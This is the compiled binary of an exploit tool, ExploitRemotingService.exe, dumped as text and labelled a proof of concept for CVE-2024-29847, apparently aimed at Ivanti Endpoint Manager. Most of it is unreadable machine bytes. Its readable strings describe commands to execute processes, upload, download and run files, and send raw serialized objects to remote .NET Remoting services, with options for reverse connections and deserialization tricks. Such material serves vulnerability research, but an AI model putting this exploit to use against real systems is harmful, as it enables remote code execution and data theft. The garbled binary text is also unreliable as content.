POC / CVE-2024-29847.exe EXE
MZ����@���	�!�L�!This program cannot be run in DOS mode.

$PEL$f�0�
�� �@ `���O��p�  H.text� � `.rsrc��@@.reloc��@B�HhLoy{*"}*B(&
}*0A
(�,+s'
%{o(
o)
(o*

+*{*"}*^(&
}}*0%
(�,(o+

+*0|(�
,(o,
+Ko-
�s.
o-
s/
%{%-&o0
o(
%{o1
o)
�Xo-
�i�
	-�*0{
+*�(&
}}}}	}
*0Xo2

o3
o4
�
	,(5
o6
+&�,(7
o6
+rps8
z*0�o9

8�(:
.+((+mo2

	E
)+5+>(+5o2
�g+'o9
�f+o3
�h+r1ps8
z+rcp(;
(<
o9

�:A���*0�o=

 .NET��,r�ps>
zo2
&o2
&o9
&o9
&o3
(
o4
s?
%o@

sA
	oB
u#�,2oC
�,oC
	+oD
%-&r�p	+
r�p	+	*0joE

(F
,Kr�prpr9p~T%-&~S��sG
%�T(+(+(J
(K
s8
z+*0<	sL

s?
%o@
,sM
oN
oO
oP

+	*0�
sL

sQ
s|{	-+�io}r=po�{�
	,&{o�rop{oR
oo~oS
{oT
sQ
oP
oS
{	,
~U
�.sV
(�,oW
�,oW
�*�9�
�P�
0(
(+*0(�
+*03
{
oX
(
u9�,t9z+*0{
oX
(
+*0��t(Y
oZ
r�p�vo[
r�pr�po[
r�pr�po[
rpr�po[
r#po\
rOp 	o]
rupo\
r�po[
r�po]
s?
%sM
oN

sL
{oO
rpoP
o[
*B(&
}*z(&
}}
}*0��w(Y
oZ
r-p{o[
r9p{
o^
o[
rSp{
o_
~V%-&~U��s`
%�V(+(+o[
rwp{o[
r�p{
oa
ob
o[
r�p~U
o[
*B(&
}*�{oc
oZ
{od
*z(e
}}}*0M,r�psf

+
r�psg

�5(Y
r�p$oh
oi
s
+	*05sj
%r�pok
%r�pr�pok

{�,m}{t,(l
(m

{�4(Y
r�p�$%�z(Y
�(n
�%	�o&�&�8�{,n}{o
oo
(m
{�,(Y
r�p�$%�$(Y
�(n
�%�o&�&�+{oo)
(<
*SB�9�D90I{u�
��,+$r	p�(Y
ob
r=p(p
sq
z*2rYpsr
z0(((+
+*0;(((+
os
�iot
�,oW
�*/0y(((+ou

sv
 �g�iow

+	(+oy
�iow

	�-�oz
�,oW
�*Pk0(((+o{

+*0
o|

+*0Mui�
,
o}
+3(~
,$}{�
	,}s
z+*s�
z0{s
+*0(�
(?
+*0A(<�
	,	(�
o�
o�
Yo�
(�
+*V(&
(>}*V(&
(?}*B(&
}*0Nr�po�
r�po�
sL

sQ
o�
{oS
r�poP
o[
*z(e
}}}*0(�
(Ps�

+*0(�
(Pr�p
+*0(�
(Pr�p
+*0(�
(P
+*0(�
(P�
+*0(�
(P{�i
+*0`(�
(Pr�pr9p{~X%-&~W��s�
%�X(+(+(J
(�
(<
{
+*0(�
(Pr�p
+*0(�
(Pr�p
+*0(�
(P
+*0-(�
(P}�G(Y
(�
tG
+*br
po^
(�
(<
*0c (�
(P{�
,#r$p(<
�(Y
rFp(�
+%rXp{o^
(�
(<
{+*0(�
(Pr~p
+*0(�
(Ps&

+*0(�
(Pr~p
+*0(�
(P}{
+*^(�
}}*0:!�,r�ps�
zo�
o�

{s�
o�
o)
ob
�h(Y
o�
r�po�

	oZ
+�{se�X�i�-���,r�p�o[
rp�	(Y
o�
r$p�i(Y
o�
r.p�i(Y
o�
rHp�i(Y
o�
r\p�i(Y
o�
rppo]
*�{o^
{oa
{o)
{o�
(W*0{o^

+*b(�
}}*0{"{t(
r�po]
r�p{ob
o[
{o�
o�
{s�
o�
r.po)
o[
r�p(�
oZ
*0�#~/,~)+
9�s�
r�p��o�
rp4�Qo)
o�
s�
%~!~"so�
s�
%~o0
so�

s�
~1�,~5o�
+o�
~o�
r4p(�
-r<p(�
-.8�rDp~ �ho�
	s�
8�rNpr<po�
rXprjpo�
rpp~(o�
r�p~)��o�
r�pr�po�
	s�
+r�p~o�
(�
s8
z~)(�
*0}$s�

~o0
~o�
o�
o�
~),Cs�

~%,~%~&~'s�
+(�
	~U
~4o�
	+*0l%~6(�
-~6+r�p
~6(�
-~o0
+~oo
��%/�o�
�~4s�
o�

+	*0q&~-(�
�
,~-s�
+M~o�
r4p(�
,	(h+,~o�
r<p(�

	,	(i+r�ps8
z*0F's�
}o}p g+� �!~ �"r	p�(�3(Y
o�
o�
o�
�.�*�+�,~U
�-s�
%r<	prN	p~Z%-&~Y��s�
%�Zo�
&%rt	pr�	p(	+~4�Q(;
~[%-&~Y��s�
%�[o�
&%r
pr,
p~\%-&~Y��s�
%�\o�
&%r|
pr�
p~]%-&~Y��s�
%�]o�
&%r�
prp~^%-&~Y��s�
%�^o�
&%rtpr�p~_%-&~Y��s�
%�_o�
&%r�pr�p~`%-&~Y��s�
%�`o�
&%r(pr4p~a%-&~Y��s�
%�ao�
&%rvpr�p~b%-&~Y��s�
%�bo�
&%r�pr�p~c%-&~Y��s�
%�co�
&%r>
prT
p~d%-&~Y��s�
%�do�
&%r�
pr�
p~e%-&~Y��s�
%�eo�
&%r�
prp��s�
o�
&%rFprTp~f%-&~Y��s�
%�fo�
&%r�pr�p~g%-&~Y��s�
%�go�
&%ripr}p~h%-&~Y��s�
%�ho�
&%r�prp(
+~5�R(;
~i%-&~Y��s�
%�io�
&%r�pr�p~j%-&~Y��s�
%�jo�
&%r
prp~k%-&~Y��s�
%�ko�
&%rprp~l%-&~Y��s�
%�lo�
&%r�pr�p~m%-&~Y��s�
%�mo�
&%ryp��s�
o�
&o�
{o
	,(�
s�
o�
&o�
�,r�ps8
zo�
s�
�o�
�#�$~$o�
�o�
(�
}p�{p,
(m++*�u90r�p�(Y
(�
(J

+*�r�p(�
(�
o�
r�p(�
*0joE

(F
,Kr�prpr9p~n%-&~Y��sG
%�n(+(+(J
(K
s8
z+*0B(Ё(Y
r�p�$(n
�$%�(Y
�o�
~*sV
+*01)~r�p~.(�
s�

o)
(�
t3+*0�*
~1
	,,~oo
�,(Y
r�p(�
(+o+
�3(Y
~2s~3(�
,~,+9~,,r�po#		o�
�3~.(r�3(Y
ob
o�
~3o�
(�
(�
o&�

o)
(<
��,>rpr!po�
o�
rpr!po�
(�
o$�&�И(Y
ob
o�
�%~.�(�
r-po(�
(<
�&�(p

o)
&
�o)
(<
�+*4��9�76=H���90�+
(�

݄&�3(Y
o�
o�
(�
(�
o�
(�
o�
(�
o�
(�
rp(�
(�

	s�
o�
�
,oW
�	(�

�+*p~
�0�,~.(r�3(Y
ob
o�
~o�
r<p(�

	9�(po)
&�'&�~oo
Ж(Y
r5p(
+(n(+o+
rMp(�
��(�
(�

~oo
З(Y
r]p�$%�i(Y
�%�(Y
�(n�%�%o�
(�
�o&+	o�

~oo
(+(+o+o�
�i%ryp~.(�
�o�
o�
s�
o�
�&�(p+*FX^_p0 -~0
,
(q+
(s+*0>.~0,s+&sD
~/
	,
s@+
(m
+*0+o�
o�

(F
,r�psq
z+*0n/
~0�,5~oo
П(Y
r�p(v(+o+
�&�(�
,(�

r�p(�
o�

+	*.>0�0~#
(� �^x`5? W�T5 �N�*;�+ W�T;�8B ��1V.u+ �^x`;�8( ��k5 �ri.h+ ��k;�8 \J�.+ �W��.8�r#p(�
:�8�r-p(�
:g8�r5p(�
:�8�r;p(�
:^8�rCp(�
:�8�rKp(�
:�8qrSp(�
:;8\r]p(�
:98G
~$o�
�,.~$o�
ripo�
,
~$o�
~$o�
,~$o�
�+,(�
rupo�
+d~$o�
~$o�
0~U
+~$o�
o�
	r�p	o�
�h(�
	

,
	o�
8z~$o�
��,(�
rpo�
+~$o�
o�
(�
8.~$o�
��

,(�
rmpo�
8�~$o�
o�
r�po�
(�
o�
+!�r�po�
(�
X�i2�o�
+-�r�po�
o�
��(�
X�i2�8Y~$o�
��,(�
rpo�
+-~$o�
(�
~$o�
o)
o�
8�~$o�
��,(�
rpo�
+(~$o�
o�
~$o�
(�
8�~$o�
�,(�
r{po�
+@~$o�
(�
~$(+(+r�po�
�h(�
+=r�po�
(�
+*r�po�
(�
+(�
rp~#o�
+*0\1(k
9E~�js
�us
~+~-(�
�s~#r/po
9�~$o�
��
	,(�
r7po�
+b~$(+(
,
(�
+(�
ou9�,
r�p(�
(
+R(g~*-
~0�+

,"(w�*r�p~*�h(�
(t		(x�(
�++*A/>9"(&
*6�4�5*B(&
}7*0T{7 .NETo�
{7o
{7o
{7o
{7o
{7o
*>{7o
*~{7o
(�(�*�{7o
{7-+�o
*^{7o
(�*�{7o
{7o
o)
(�*r{7o
{7o
*�{7o
{7o
(�*07(7
o	

{7o
{7�io
{7oS
*0.2,) ŝ�
+o

a �Z
Xo�
/+�*.s��S*ob
*.s��U*o
*.s��W*o)
*.s��Y**��)*:4(+&*2(

� *�!*2(

�"*�(*0@3�%~%\(+
,(~%��%\�o�
��'��%*�&*2(

�***��/*�6*�.**��0*B�%�1�0*B�%�2�0*:5(+&**��+**��,*�3*�-*.�}o*.�}p*BSJBv4.0.30319l$!#~�!� #Strings`B( #US�b#GUID�bp#BlobW�	�3�p��$3	�
�IE
I��i =�=�=,
=�=�=7=*�*k=R^�/#;�I}����;�;�;�;;�
;
�/L/���//=���
 ��^<�
/
/���/� � S �=�/se�/�/�/H/�	/Sd:�	r�E=�e&�/
����]���j*&/����K<0<<< e�*h<�=O	=="=y=�=f'/�=�P�h;�;j;
m�
�� 
 ���x�="&/���/�/a/w/
�/3G�/G/�
/�/�/
x�
���O=�=�S*�<� �/&�;/&@�<�=	�z�	/�/���*�/�/�/�/Oe��sE;
��
��
�� ./����y �
[�
8�
?�
�/�/���/L����d�����/"./�=�/4/�/b>~A�~A~~A
 �~A a~A M~A�~� ~A<?~�D ~}V 
~Ae~Ag�VA7|Z
V�8� V�<��V�?�/V�G�-V�M��V�P�kAS�!!AS�!!AU�!!AW�!!AY��Ao�!��!!������!��!��!��!����!�!?�!����!��!A�!���Q�e�������?�G����%�������������	S�m	�
�����H�Qv	6���H��<���1!���	V�	V��	V� 	�	V��		V��		�	V��
	V�G
	V��
	V�R
	V��
	V�s
	V��

	�	V��	V��	V��
	V�j	V��	�	V�	V�	�	V��	V�t	6? 	C$	6?/	�3	6?@	�D	6?M	�Q	-Q	�Q	&Q	�Q	�Q	qQ	�Q	�Q	CQ	Q	�Q	Q	EQ	�Q	Q	�Q	�Q	Q	"Q	f$	��P �	5Y	X �	>�a ��t ���� �	5^	� �	>�� ��t� ���	 !���
�!�zc	�!��h	�!���	T"���	0#�a�	$��	|$�x�	�$���	�%���	�%�&�	&�&�	X&���	!�&���$a'���	&r'���	'�'���*[(���	,l(���-�(���	/�(�Z�	2)��	4l*���	5�*��E5�*��M7�*���8�*�H R:�*��r;P+�|y=�+��>�*��	�?�*���?,� ?0,��&A�,��+B�,�|1B�,�8C�,�c
?D�,��
FE�,�NMF�,�1TG�,��[H�,��bI�,��iJ�,�fpK�,�_wL�,��~M�,�2�N�,��	�O�,���P�,�v
�Q�� �	S�� ��	U�,��
W�,��
X!-���	Y7-��
ZM-��I[`-���\�-���	^�-�	�
a.�
a$.�	"
bH.�	��ch.�	�'
c�.�	��c�.�	�'
c /�

cD/�	"
dh/�	��e�/�	d,
e�/�2
e�/�	+8
fL0�	��fp0�	[f�0�	��f�0�	z�f�0��=
f�0��D
hB2���n�,�W
p�,��]
p�,�zp�,��c
p�,�s
u�,�9
�u�,�7y
u�,�7�
w�,���
x�,��
�
z|2���z�,�
�z�2���
z�2���|<3�%�
~�4���
~x5���
~�5���
~p6���
~�;���
�;���
$<��	��<���
��<�r�
�,=��
�,?�NX��?�4�
��A�`�
��A�g�
�B�� �
�PB���
��B���
��G���
�I���
I���
�I���
�,I���
��I�3��I����I�B��I�o��I����"J���?J�X�dJ����J�	��J���
�I����J�M��J���
�I���K���
K���
�I���K���K���
�I���*K���5K�7�DK���QK�0�YK���fK���pK�{��K����K���K�M��K���K���K���K�P�L���L��(L���3L���>L�)�FL�-��J�p�I���NL�q�ZL���
�~��
�����������
�	���	��Yw�Yw�Yw�����L�������LYU ����l�YY�YY�� ����������������K
���%��������L�p�p�w���	D�
������#+
MM+
M�����
�
�	� 
����YL���	�h��h
i)	�
r_��
�
������������������������E]������	�
	


��	���
)�1�9�A�I�Q�Y�a�i�q�y�����)�i4 i�&q�+q�1q,8qw
?q�
FqbMqETq�[q�bq�iqzpqswq
~qF�q�	�q��q�
�������������������������	��
���K�!!�!�)�&1��I`Q�	%�>Y�	�	TB�I	�
O�U�
[!$g�_ |��y��y��I��I(����	��	�
���1��C�1�I�I� ��l$�@!MXI�
aI�
hI�
nI�
t����z,���9
�!	���
�A��a�����!����
�����������!$��2�I(������#��/�qI4��uVy�^4su4�����4������ �����������<	�I^�I��x�IK	I�1���.�<�D��I`	�!$-���!�C�4	I��OI�W��
^I�
j��s��a!�
���)�����>�����>������	�I_ �)��1��9���������t��������I���w�I� I.������8I����T���_�y�w�Q����y�\��\����\|��$���	%���-����i��I(����	���� "Ie�	������3��	�I]8�U�	�>�zX�z_�"i��p��w�\	3��}�"��������>XIk �����)��	��{�D�!� ��!��_ �����	�Q�I4=\�[���	��E�j��U��M�H R�xY�����`�^g��	k��r�|y�by�^�����	������	h��$��I4�y'����	�1��1��1�!pyI��Y�
�t�Aw�y\�P����������������� �$�(�,�0�8�<�D�H� {\.p.y.�.#�.+�.3�.;�.C�.K�.S�.[�.c�.k.s@{\A{\A�a�{\�{\��a�{\C[jc[j�{\��\�{\�{\{\#{\C{\��\�\d�\ +\D�\�����*_��!'/KO���7��������'4z��0C���G�������
B#B(�-�2�8�<�8�<�AhE/K�P	T�P�P@X.^=
d�
jh	P	
d
E	HI
JKNOQRSTUY!]#^%b'c)d+R%T'V)X+Z-\/^1`3b5d7f9h;j=l?nApCrEtGvIL�,5�O�eX��y{��~��/d����
x/��


'�?�������������>>�q��m�s�)&-��&���&�&����m�s<>9__28_10<ProcessArgs>b__28_10<>9__28_20<ProcessArgs>b__28_20<>9__11_0<GetStaticMethod>b__11_0<>9__31_0<GetStaticMethod>b__31_0<>9__4_0<GetObjectData>b__4_0<>9__16_0<get_Args>b__16_0<>9__28_0<ProcessArgs>b__28_0<>c__DisplayClass28_0<>9__28_11<ProcessArgs>b__28_11<ProcessArgs>b__21<>9__28_1<ProcessArgs>b__28_1Func`1IEnumerable`1Action`1List`1<ProcessArgs>b__12ReadUInt32System.IConvertible.ToUInt32ReadInt32System.IConvertible.ToInt32<>9__28_2<ProcessArgs>b__28_2Func`2Dictionary`2<>9__28_13<ProcessArgs>b__28_13<>9__28_3<ProcessArgs>b__28_3<>9__28_14<ProcessArgs>b__28_14System.IConvertible.ToUInt64System.IConvertible.ToInt64<>9__28_4<ProcessArgs>b__28_4Func`4<>9__28_15<ProcessArgs>b__28_15<>9__28_5<ProcessArgs>b__28_5<>9__28_16<ProcessArgs>b__28_16ReadUInt16System.IConvertible.ToUInt16System.IConvertible.ToInt16Uint16<>9__28_6<ProcessArgs>b__28_6<>9__28_17<ProcessArgs>b__28_17<>9__28_7<ProcessArgs>b__28_7<>9__28_18<ProcessArgs>b__28_18get_UTF8<>9__28_8<ProcessArgs>b__28_8Utf8<>9__28_19<ProcessArgs>b__28_19<>9<>9__28_9<ProcessArgs>b__28_9<Module><PrivateImplementationDetails>System.IOThrowExceptionForHRTvalue__System.Data_marshalledDataremoteChannelDataGetChannelDatachannelDataGetObjectDatadatadnlibmscorlib_mb<>cppbcSystem.Collections.GenericSystem.Runtime.Remoting.Channels.Ipcget_IdOpenReadLoadAddNotChunkedIsDefinedReservedVoidNewGuid<Next>k__BackingFieldGetField_cmdExecuteCommandRunCommandUriKindMakeGenericMethodGetStaticMethodFakeMethodGetGetMethodGetCurrentMethod_method_sendmethod_passwordReplaceIsNullOrWhiteSpaceTraceExploitRemotingServiceGetCreateInstanceSystem.IConvertible.GetTypeCodeSystem.Collections.IEqualityComparer.GetHashCodeTcpStatusCodeFileModeget_UnicodeIMessageget_MessageIMethodMessageFakeMessageIMethodCallMessageIMethodReturnMessageAddRangeRemoveRangeCredentialCacheTakeInvoke_fakeTableEnumerableIDisposableHashtableISerializableIConvertibleWritePreambleSystem.IConvertible.ToDoubleget_MethodHandleRuntimeMethod
HandleRuntimeTypeHandleGetTypeFromHandleSystem.IConvertible.ToSingleReadFileWriteFileConsoleFormatterAssemblyStyleget_Nameset_Nameget_MethodNameGetFileNameget_TypeNameset_FullTypeNameremoteNameGetInArgNameGetArgNameget_FullNameheaderNameGetNameGetDisplayNameset_AssemblyNameGetDirectoryName_ipcname_remotenameGetUsername_usernameget_SchemeSystem.IConvertible.ToDateTimeSystem.Runtime.Remoting.Lifetimeset_CommandLineWriteLineCombineget_ReflectedTypeFakeTyperemoteTypeattributeTypeget_DeclaringTypeconversionTypeOperationTypeoperationTypeSystem.IConvertible.ToTypeget_MemberTypeget_ParameterTypeGetTypeSetTypeContentTypecontentTypetypeSystem.CoreIChannelDataStore_secureget_MethodSignaturesignaturecultureget_MethodBaseILease_lease_useleaseStatusPhrasestatusPhraseDisposeTryParseDebuggerBrowsableStateWriteremoteMTAThreadAttributeCompilerGeneratedAttributeGuidAttributeDebuggableAttributeDebuggerBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeParamArrayAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeSystem.IConvertible.ToSByteReadByteSystem.IConvertible.ToByteAddValueget_ReturnValueheaderValueSetValuevalueExploitRemotingService.exeSerializeDeserializeAssemblyDef_useObjRefFakeComObjRefStringEncodingSystem.Runtime.Remoting.MessagingSystem.Runtime.VersioningFromBase64StringUTF8StringWriteCountedStringSystem.IConvertible.ToStringReadHeaderStringGetStringSubstringSystem.Runtime.RemotingGetInArgGetArgdebugComputeStringHashset_Pathget_AbsolutePathget_LocalPath_output_pathget_LengthcontentLengthmiget_UriGetObjectUriRequestUrirequestUri_null_uri_capturedobjretobjpUnkCreateSinkIServerChannelSinkIClientChannelSinkDataSetMarshalCreateRemoteClassSerialNetworkCredentialSystem.IConvertible.ToDecimalSystem.Security.PrincipalIChannelIpcChannelCustomChannelTcp
ChannelRegisterChannel_channelTokenImpersonationLevel_tokenImpersonationLevelProtectionLevelset_TypeFilterLevel_typeFilterLevelTraceMethodCallMakeCallSystem.Configuration.Installole32.dllExploitRemotingService.RemotingProtocolurlBindIpcStreamBindStreamFileStreamNegotiateStreamNetworkStreamBindTcpStreamGetStreamNamedPipeClientStreamMemoryStream_bind_streamProgramget_Itemset_ItemOperatingSystem_usecomLoadFromCustomGenerateAndLoadDynamicFakeAsmasmargNumEnumSystem.IConvertible.ToBooleanHeaderTokenOpenMain_domainJoinGetOSVersionget_Versionset_VersionDetectMajorVersion_versionget_LocationSystem.GlobalizationSystem.Runtime.SerializationSystem.ReflectionICollectionTraceListenerCollectionCloseConnectionPipeDirectionget_ExceptionInvalidDataExceptionNotImplementedExceptionRemotingExceptionArgumentNullExceptionInvalidOperationExceptionArgumentExceptionContentDistributionStringComparisonFieldInfoMethodInfoGetFileInfoCultureInfoFileSystemInfoGetSerializationInfoMemberInfoParameterInfoDirectoryInfoPropertyInfoinfoSystem.Runtime.Remoting.Channels.TcpSkipPrintHelpshowhelpSystem.LinqSystem.IConvertible.ToCharWriteEndHeaderWriteStatusCodeHeaderWriteContentTypeHeaderWriteStatusPhraseHeaderWriteRequestUriHeaderWriteCustomHeaderWriteCloseConnectionHeaderBinaryReaderreaderIServerChannelSinkProviderChannelUriFixingServerChannelSinkProviderIClientChannelSinkProviderChannelUriFixingClientChannelSinkProviderBinaryServerFormatterSinkProviderBinaryClientFormatterSinkProviderIFormatProviderproviderUriBuilderIChannelSenderBinderbinderParameterModifierIMonikerCreateObjrefMonikerppMonikerAssemblyInstallerConsoleTraceListenerSerializableWrapperMethodCallWrapperIEqualityComparer_ser_useserdnlib.DotNet.WriterTcpMessageWriterTextWriterBinaryWriterwriterSerializableRegisterBinaryFormatter_verIChannelReceiverSendRequestToServerSetupServer_ipcserver_installdir_autodirget_Majorget_ErrorCommandErrorisErrorISponsorTypeDelegatorActivator.ctor.cctorISurrogateSelectorset_SurrogateSelectorRemotingSurrogateSelect
orinvokeAttrSystem.DiagnosticsRemotingServicesChannelServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModesGetDirectoriesget_PropertiesGetFilesGetEnumNamesGetNamesSystem.IO.PipesargTypesSystem.Runtime.InteropServices.ComTypesMemberTypesget_AttributesMethodAttributesMethodImplAttributesGetCustomAttributesReadBytesReadAllBytesWriteAllBytesGetBytesBindingFlagsGetMethodImplementationFlagsget_Argsget_InArgsget_HasVarArgsProcessArgs_args_cmdargsget_ChannelUrisget_DefaultNetworkCredentialsSystem.Collections.IEqualityComparer.EqualsSystem.Runtime.Remoting.ChannelsContainsSystem.CollectionsNDesk.OptionsPipeOptionsModuleCreationOptionsModuleWriterOptionsWriteOptionDescriptionsget_CharsReadHeadersEndHeadersget_ListenersGetParametersparametersSystem.Runtime.Serialization.FormattersreflectedClassIRemoteClassCreateRemoteClassGetExistingRemoteClassSerializerRemoteClassFileAccessSuccessRunProcessprocessSystem.Net.SocketsGetGenericArgumentsgenericArgumentscontentsget_ExistsFileExistsRemoveAt_tConcatHeaderDataFormatSerializationFormatset_AssemblyFormatGetMessageObjectSerializeObjectMarshalByRefObjectMarshalObjectGetIUnknownForObjectGetObject_send_object_get_message_objectSelectConnectSystem.Netdnlib.DotNetDataSetOptionSetop_ImplicitSplitCreateRemoteClassExploitinheritWaitForExitParseResultTcpClientAuthenticateAsClientEnvironmentget_Countget_ArgCountget_InArgCountConvertget_Portset_Port_publicPort_portCastSendRequestOneWayRequestget_Hostset_Host_publicHostFirstget_Outget_Nextset_NextSystem.TextStreamingContextget_LogicalCallContextset_UseNewContextcontextvMakeCallNoThrowindexIBindCtxCreateBindCtxToArray_one_wayget_AssemblyExecuteAssemblyGetExecutingAssemblyReplySystem.Runtime.Serialization.Formatters.BinaryIDictionaryGetDirectorydirectoryop_Equalityop_InequalityHandleInheritabilitySystem.Net.SecurityIsNullOrEmptyGetPropertyIsTransparentProxy/Invalid string encoding1Unknown header data typeHeader: {0}={1}'Invalid magic value	void=Error, invalid return 
message.+Could not get method  with types ,1application/octet-stream__RequestUri-DataSet.RemotingFormat'DataSet.DataSetName#DataSet.NamespaceDataSet.Prefix+DataSet.CaseSensitive%DataSet.LocaleLCID5DataSet.EnforceConstraints5DataSet.ExtendedProperties)DataSet.Tables.Count!DataSet.Tables_0__Uri__MethodName#__MethodSignature
__Args__TypeName__CallContext.FullPathaDummyRegisterCreateObjRef3Couldn't get instance of  from server.mSpecify --installdir or --autodir parameters to enable��System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aGSystem.EnterpriseServices.ComObjRef
bufferUnknown!Send Args: ({0})Calling: {0}!Sending ToStringToString%Sending {0} method
badger	info_System.Reflection.MemberInfoSerializationHolderDUMMY!GenericArguments	NameAssemblyNameClassNameSignatureMemberTypeUnityType	Data?System.UnitySerializationHolderincludeVersions/tokenimpersonationleveltcpipc	port	namepriority20portName
secureauthorizedGroupeveryone-Unknown URI scheme {0}+Could not bind streamremotingexploits|secure%Enable secure mode1tokenimpersonationlevel=uTokenImpersonationLevel in secure mode: {0} (default: {1})p|port=OSpecify the local TCP port to listen onpublichost=_Specify the public host for reverse connectionspublicport=gSpecify the public TCP port for reverse connections
i|ipc=WSpecify listening pipe name for IPC channeluser=ASpecify username for secure modepass=ASpecify password for secure mode	ver=SSpecify version number for remote, 2 or 4
usecom[Use DCOM backchannel instead of .NET remotingipcserver==Connect to a remote IPC serverremname=USpecify the remote object name to registerv|verbose7Enable verbose debug output
useser��Uses old serialization tricks, only works on full type filter servicesuseleasesUses new serialization tricks by abusing lease mechanism.useobjrefuUses new serialization tricks by abusing ObjRef mechanism.!typefilterlevel=��TypeFilterLevel for the BinaryFormatter/SoapFormatter: {0} (default: {1})nulluriODon't send the URI header to the serverautodir��When useser is specified try and automatically work out the installdir parameter from the server's current directory.installdir=��Specify the install directory of the service executable to enable full support with useserpath=��Specify an output path to write the request data rather than to a channel.h|?|help=Must specify a URI and command, ��ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
The supported URI are as follows:
tcp://host:port/ObjName   - TCP connection on host and portname
ipc://channel/ObjName     - Named pipe channel

Options:
��
Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd  cmdline                  : Execute a command line process and display stdout
put  localfile remotefile     : Upload a file to the hosting server
get  remotefile localfile     : Download a file from the hosting server
ls   remotedir                : List a remote directory
run  file [args]              : Upload and execute an assembly, calls entry point
user                          : Print the current username
ver                           : Print the OS version
raw base64_object|file        : Send a raw serialized object to the service.
CreateInstance/3InitializeLifetimeService	.dll.aspx{0}GetTempPath{0}.dllWriteAllBytes
/name=+Invalid property nameVersion_Error, couldn't detect version, using host: {0}	execcmdlsputgetrun	userosver-waitoMust specify at least 1 or two options for exec command7Received new process id {0}OMust specify 1 argument for cmd commandMMust specify 1 argument for ls command+Listing {0} directory<DIR> {0}!{0} - Length {1}]Must specify localfile and remotefile argumentOMust specify an assembly file to uploadResult: {0}User: {0}OS: {0}'Unknown command {0}raw��Must specify base64 encoded string or a file containing the raw data.+[!] Remote Exception:7Detected version {0} serverbG3*��G�x�VP�?%      M   �� �� �� �� �� �� �� �� 	�� 
�� �� �� 
�� ���� ���� ��	 ����UU  UYaa aem i  mm	   �� 	 
	������ 	 ��  u �� }} ���1�5����}}	���� ������
��
��
���� �� u 	����8u���� uqu 
y}
 �������� ��    ��������
����
�� ��	 ����
����	 ���1 ������ ��������
 ������
������
�� ������ ���� ���� ����

 ��   
� �� ���� 	��}���
���} ���%�� �m �%  �} ���� �� �����%��	��M�Q��U	 �� ] E �I
 �E]�U�Yu�]�au �! �a
 �a�)�E	�eu  �1�5�E�9u
 ����h�i������
 �i��
�E
�I �i�� �����= �E��  �I ���Q �Q}	 ����m�� m��#���� �m����������

�� ���m�q���m�m	�q�e�i �i�m �i�i �� u�m�m�������u�q
�u  ���( �y ���}
�}	�}�}�}0	������������ �� ��  �� �� �� 
    ��
���� ��  	 	
��
�z\V4�P�cx��y��?_�
:lSpecify --installdir or --autodir parameters to enableE]mquy}}���������E�I��<@DHLPX
����\������`��d�� E ] m mquy}������}����  
0} }  } ��	 ��0�	�  �    �} } } �����!�� �) �- �1�5�9 �= ��  �� �! ��u�i}������}}���� �� < 	 �� ���� (E(](m(�((((�(}(((�)(�=(��(�!TWrapNonExceptionThrowsExploitRemotingServiceCopyright ©  2013)$1850b9bb-4a23-4d74-96b8-58f2746745661.0.0.0I.NETFramework,Version=v4.8TFrameworkDisplayName.NET Framework 4.8$f ����RSDSi�_{��BN��d��L�D:\workspaces\workspace-new-zdi\zdi-daily\Ivanti\Ivanti-Endpoint-Manager-EPM\pocs\AgentPortal-RCE\ExploitRemotingService-master-32bit\ExploitRemotingService-master-32bit\ExploitRemotingService-master\ExploitRemotingService\obj\x86\Debug\ExploitRemotingService.pdbԼ� �_CorExeMainmscoree.dll�% @ �P�8��h�����4VS_VERSION_INFO��?DVarFileInfo$Translation��StringFileInfo�000004b0Comments"CompanyNameVFileDescriptionExploitRemotingService0FileVersion1.0.0.0VInternalNameExploitRemotingService.exeHLegalCopyrightCopyright �  2013*LegalTrademarks^OriginalFilenameExploitRemotingService.exeNProductNameExploitRemotingService4ProductVersion1.0.0.08Assembly Version1.0.0.0,��<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>�=